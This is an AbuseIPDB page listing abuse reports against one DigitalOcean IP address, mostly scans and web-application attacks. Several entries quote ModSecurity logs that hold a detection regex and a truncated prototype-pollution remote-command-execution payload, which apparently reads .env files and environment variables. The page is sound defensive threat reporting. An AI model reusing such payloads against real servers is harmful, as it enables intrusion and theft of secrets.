JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 159.223.22.139

159.223.22.139 was found in our database!

This IP was reported 76 times. Confidence of Abuse is 83%: ?

83%

ISP	DigitalOcean, LLC
Usage Type	Data Center/Web Hosting/Transit
ASN	AS14061
Domain Name	digitalocean.com
Country	🇩🇪 Germany
City	Frankfurt am Main, Hesse

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 159.223.22.139

Whois 159.223.22.139

IP Abuse Reports for 159.223.22.139:

This IP address has been reported a total of 76 times from 39 distinct sources. 159.223.22.139 was first reported on March 12th 2026, and the most recent report was 20 hours ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇩🇪 4server	2026-06-19 02:09:44 (20 hours ago)	[FriJun1904:09:41.4673242026][security2:error][pid1125557:tid1125579][client159.223.22.139:0]ModSecu ... show more [FriJun1904:09:41.4673242026][security2:error][pid1125557:tid1125579][client159.223.22.139:0]ModSecurity:Accessdeniedwithcode403$phase2$.Patternmatch\"$\?:\\\\\\\\\$\(\?:\\\\\\\\\(\(\?:\\\\\\\\\(.\\\\\\\\\$\\|.\\)\\\\\\\\\)\\|\\\\\\\\{.\\\\\\\\\}\)\\|[\<\>]\\\\\\\\$.\\\\\\\\\$\)\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"396\"][id\"393655\"][rev\"17\"][msg\"Atomicorp.comWAFRules:PossibleRemoteCommandExecution:UnixShellExpressionFound\"][data\"MatchedData:\${b}307\`}\)_chunks:\$q2_formdata:{get:\$1:constructor:constructor}}}foundwithinARGS:0:{then:\$1:__proto__:thenstatus:resolved_modelreason:-1value:{then:\$b1337}_response:{_prefix:varres=process.mainmodule.require$child_process$.execsync\(buffer.from\(zwnobyakkcg0msoynzepktsgzwnobyanpt09re9uru5wpt09jzsgy2f0ic5lbnyglmvudi5sb2nhbcauzw52lnbyb2r1y3rpb24glmvudi5kzxzlbg9wbwvudcauzw52lnn0ywdpbmcglmvudi5iywnrdxagli4vlmvudiauli8uli8uzw52idil2rldi9udwxsoybly2hvicc9pt1quklovevovj09psc7ihbyaw50zw...\"][tag\"attack-rce\"][hostna show less	Port Scan Brute-Force Web App Attack
🇬🇧 poundawebsiteltd	2026-06-16 13:02:05 (3 days ago)	Web App Attack (ModSecurity Block). Evidence: [REDACTED_DOMAIN]:443 159.223.22.139 - - [16/Jun/2026: ... show more Web App Attack (ModSecurity Block). Evidence: [REDACTED_DOMAIN]:443 159.223.22.139 - - [16/Jun/2026:14:02:02 +0100] POST / HTTP/1.1 403 2867 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 show less	Web App Attack
🇦🇹 urnilxfgbez	2026-06-14 22:45:00 (5 days ago)	Last 24 Hours suspicious: (DPT=445\|DPT=3389\|DPT=22\|DPT=3306\|DPT=8080\|DPT=23\|DPT=5900\|DPT=1433)	Port Scan
🇩🇪 4server	2026-06-14 08:30:03 (5 days ago)	[SunJun1410:29:57.7881542026][security2:error][pid2397638:tid2397696][client159.223.22.139:0]ModSecu ... show more [SunJun1410:29:57.7881542026][security2:error][pid2397638:tid2397696][client159.223.22.139:0]ModSecurity:Accessdeniedwithcode403$phase2$.Patternmatch\"$\?:\\\\\\\\\$\(\?:\\\\\\\\\(\(\?:\\\\\\\\\(.\\\\\\\\\$\\|.\\)\\\\\\\\\)\\|\\\\\\\\{.\\\\\\\\\}\)\\|[\<\>]\\\\\\\\$.\\\\\\\\\$\)\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"396\"][id\"393655\"][rev\"17\"][msg\"Atomicorp.comWAFRules:PossibleRemoteCommandExecution:UnixShellExpressionFound\"][data\"MatchedData:\${b}307\`}\)_chunks:\$q2_formdata:{get:\$1:constructor:constructor}}}foundwithinARGS:0:{then:\$1:__proto__:thenstatus:resolved_modelreason:-1value:{then:\$b1337}_response:{_prefix:varres=process.mainmodule.require$child_process$.execsync\(buffer.from\(zwnobyakkcg0msoynzepktsgzwnobyanpt09re9uru5wpt09jzsgy2f0ic5lbnyglmvudi5sb2nhbcauzw52lnbyb2r1y3rpb24glmvudi5kzxzlbg9wbwvudcauzw52lnn0ywdpbmcglmvudi5iywnrdxagli4vlmvudiauli8uli8uzw52idil2rldi9udwxsoybly2hvicc9pt1quklovevovj09psc7ihbyaw50zw...\"][tag\"attack-rce\"][hostna show less	Port Scan Brute-Force Web App Attack
🇷🇸 Scan	2026-06-13 01:18:46 (6 days ago)	MultiHost/MultiPort Probe, Scan, Hack -	Port Scan Hacking
🇷🇸 Smel	2026-06-13 01:08:13 (6 days ago)	SQL/MH Probe, Scan, Hack -	Port Scan Hacking SQL Injection
🇺🇸 MPL	2026-06-12 10:19:15 (1 week ago)	tcp/5432 (2 or more attempts)	Port Scan
🇩🇪 Florea	2026-06-10 14:12:11 (1 week ago)	Shield Guard: RFI/LFI dans 'POST:0' \| Command Injection dans 'POST:0'	SQL Injection
🇫🇷 Version Net	2026-06-08 19:52:54 (1 week ago)	IPS Detection: Vercel.Next.js.x-middleware-subrequest.Authentication.Bypass	Hacking
🇫🇷 vincent_EUDIER	2026-06-07 16:40:00 (1 week ago)	ET SCAN Suspicious inbound to mySQL port 3306	Port Scan
🇪🇸 mescribano	2026-06-06 20:10:02 (1 week ago)		Bad Web Bot Web App Attack
🇷🇸 Smel	2026-06-04 11:38:06 (2 weeks ago)	SQL/MH Probe, Scan, Hack -	Port Scan Hacking SQL Injection
🇩🇪 4server	2026-06-04 10:16:42 (2 weeks ago)	[ThuJun0412:16:39.7464972026][security2:error][pid3184971:tid3185056][client159.223.22.139:0]ModSecu ... show more [ThuJun0412:16:39.7464972026][security2:error][pid3184971:tid3185056][client159.223.22.139:0]ModSecurity:Accessdeniedwithcode403$phase2$.Patternmatch\"$\?:\\\\\\\\\$\(\?:\\\\\\\\\(\(\?:\\\\\\\\\(.\\\\\\\\\$\\|.\\)\\\\\\\\\)\\|\\\\\\\\{.\\\\\\\\\}\)\\|[\<\>]\\\\\\\\$.\\\\\\\\\$\)\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"396\"][id\"393655\"][rev\"17\"][msg\"Atomicorp.comWAFRules:PossibleRemoteCommandExecution:UnixShellExpressionFound\"][data\"MatchedData:\${b}307\`}\)_chunks:\$q2_formdata:{get:\$1:constructor:constructor}}}foundwithinARGS:0:{then:\$1:__proto__:thenstatus:resolved_modelreason:-1value:{then:\$b1337}_response:{_prefix:varres=process.mainmodule.require$child_process$.execsync\(buffer.from\(zwnobyakkcg0msoynzepktsgzwnobyanpt09re9uru5wpt09jzsgy2f0ic5lbnyglmvudi5sb2nhbcauzw52lnbyb2r1y3rpb24glmvudi5kzxzlbg9wbwvudcauzw52lnn0ywdpbmcglmvudi5iywnrdxagli4vlmvudiauli8uli8uzw52idil2rldi9udwxsoybly2hvicc9pt1quklovevovj09psc7ihbyaw50zw...\"][tag\"attack-rce\"][hostna show less	Port Scan Brute-Force Web App Attack
🇺🇸 MPL	2026-05-29 19:41:09 (3 weeks ago)	tcp/5432 (4 or more attempts)	Port Scan
🇷🇸 Smel	2026-05-28 03:53:03 (3 weeks ago)	SQL/MH Probe, Scan, Hack -	Port Scan Hacking SQL Injection

Showing 1 to 15 of 76 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇮🇩 202.51.214.98

🇭🇰 154.89.156.60

🇬🇧 146.198.103.135

🇹🇷 31.223.41.72

🇺🇸 20.169.107.210

🇵🇪 2620:0:877:5100::42

🇹🇭 203.154.158.195

🇩🇴 190.103.180.126

🇲🇽 187.249.130.158

🇸🇪 157.22.124.97

🇮🇳 150.242.200.22

🇮🇩 103.76.120.81

🇸🇬 43.173.173.157

🇨🇭 209.99.185.195

🇪🇨 186.68.232.149

🇮🇷 185.172.214.211

🇻🇳 113.178.37.184

🇨🇦 85.217.149.45

🇳🇱 45.148.10.230

🇩🇪 45.3.44.214